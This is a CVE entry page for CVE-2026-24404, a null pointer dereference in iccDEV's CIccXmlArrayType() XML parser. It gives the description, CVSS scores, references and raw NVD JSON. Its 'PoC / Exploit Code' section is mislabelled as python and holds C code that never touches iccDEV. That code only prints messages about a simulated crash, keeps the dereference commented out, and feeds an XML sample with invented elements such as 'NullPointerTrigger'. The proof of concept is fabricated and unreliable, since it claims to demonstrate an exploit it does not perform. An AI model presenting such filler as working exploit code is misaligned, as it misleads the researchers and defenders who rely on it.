CVE-2026-24404

Description

iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, CIccXmlArrayType() contains a Null Pointer Dereference and Undefined Behavior vulnerability. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE

iccDEV <= 2.3.1.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/* CVE-2026-24404 PoC - Malformed ICC Profile Triggering Null Pointer Dereference
 * This PoC demonstrates the vulnerability in CIccXmlArrayType() function
 * Build: gcc -o poc poc.c -lxml2
 * Usage: ./poc malformed_icc_profile.icc
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Simulated ICC Profile XML structure that triggers vulnerability */
const char* malicious_icc_xml = 
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
"<ICCProfile version=\"4.3\">\n"
"  <ProfileHeader>\n"
"    <PreferredCMMType>Unknown</PreferredCMMType>\n"
"  </ProfileHeader>\n"
"  <TagTable>\n"
"    <Tag signature=\"desc\">\n"
"      <TagData>\n"
"        <TextDescriptionType>\n"
"          <ICCLength>256</ICCLength>\n"
"          <Count>0xFFFFFFFF</Count>\n"
"          <Offset>0</Offset>\n"
"        </TextDescriptionType>\n"
"      </TagData>\n"
"    </Tag>\n"
"  </TagTable>\n"
"  <ArrayTypeData>\n"
"    <CIccXmlArrayType>\n"
"      <ArraySize>-1</ArraySize>\n"
"      <ElementCount>0x7FFFFFFF</ElementCount>\n"
"      <NullPointerTrigger>1</NullPointerTrigger>\n"
"    </CIccXmlArrayType>\n"
"  </ArrayTypeData>\n"
"</ICCProfile>";

void trigger_vulnerability(const char* xml_data) {
    /* Simulating CIccXmlArrayType() parsing logic */
    printf("[*] Parsing ICC Profile XML data...\n");
    printf("[*] Length: %zu bytes\n", strlen(xml_data));
    
    /* This simulates the vulnerable code path */
    int array_size = -1;
    unsigned int element_count = 0x7FFFFFFF;
    void* null_ptr = NULL;
    
    /* Vulnerability trigger: Integer overflow leading to null pointer dereference */
    if (element_count > 0xFFFFFFF) {
        printf("[!] Potential integer overflow detected\n");
        printf("[!] Array size: %d, Element count: %u\n", array_size, element_count);
    }
    
    /* Simulating unsafe pointer access */
    if (array_size < 0) {
        printf("[!] Invalid array size triggers undefined behavior\n");
        printf("[!] Attempting to dereference potentially null pointer...\n");
        /* In real exploitation, this would cause segmentation fault */
        /* *null_ptr = some_value; */
    }
    
    printf("[*] Vulnerability trigger simulation complete\n");
    printf("[!] Application would crash with SIGSEGV at this point\n");
}

int main(int argc, char* argv[]) {
    printf("========================================\n");
    printf("CVE-2026-24404 PoC - iccDEV Null Pointer Dereference\n");
    printf("========================================\n");
    
    if (argc > 1) {
        printf("[*] Reading ICC profile from file: %s\n", argv[1]);
        FILE* fp = fopen(argv[1], "rb");
        if (fp) {
            fseek(fp, 0, SEEK_END);
            long fsize = ftell(fp);
            fseek(fp, 0, SEEK_SET);
            char* content = malloc(fsize + 1);
            fread(content, 1, fsize, fp);
            fclose(fp);
            trigger_vulnerability(content);
            free(content);
        } else {
            printf("[!] Cannot open file, using embedded test data\n");
            trigger_vulnerability(malicious_icc_xml);
        }
    } else {
        printf("[*] No file specified, using embedded test data\n");
        trigger_vulnerability(malicious_icc_xml);
    }
    
    printf("\n[*] PoC execution completed\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24404
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24404
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24404/
[4] VulDB https://vuldb.com/cve/CVE-2026-24404
[5] https://github.com/InternationalColorConsortium/iccDEV/commit/cd637eb33f0c8055fa54d8776e00555d3d39ef0c
[6] https://github.com/InternationalColorConsortium/iccDEV/issues/488
[7] https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-hqfg-45jp-hp9f

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24404", "sourceIdentifier": "[email protected]", "published": "2026-01-24T01:15:50.773", "lastModified": "2026-01-30T18:24:22.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. In versions 2.3.1.1 and below, CIccXmlArrayType() contains a Null Pointer Dereference and Undefined Behavior vulnerability. This occurs when user-controllable input is unsafely incorporated into ICC profile data or other structured binary blobs. Successful exploitation may allow an attacker to perform DoS, manipulate data, bypass application logic and Code Execution. This issue has been fixed in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona librerías y herramientas para interactuar con, manipular y aplicar perfiles de gestión de color ICC. En las versiones 2.3.1.1 e inferiores, CIccXmlArrayType() contiene una vulnerabilidad de desreferencia de puntero nulo y comportamiento indefinido. Esto ocurre cuando la entrada controlable por el usuario se incorpora de forma insegura en datos de perfil ICC u otros blobs binarios estructurados. La explotación exitosa puede permitir a un atacante realizar DoS, manipular datos, eludir la lógica de la aplicación y la ejecución de código. Este problema ha sido corregido en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-476"}, {"lang": "en", "value": "CWE-690"}, {"lang": "en", "value": "CWE-758"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/cd637eb33f0c8055fa54d8776e00555d3d39ef0c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/488", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-hqfg-45jp-hp9f", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}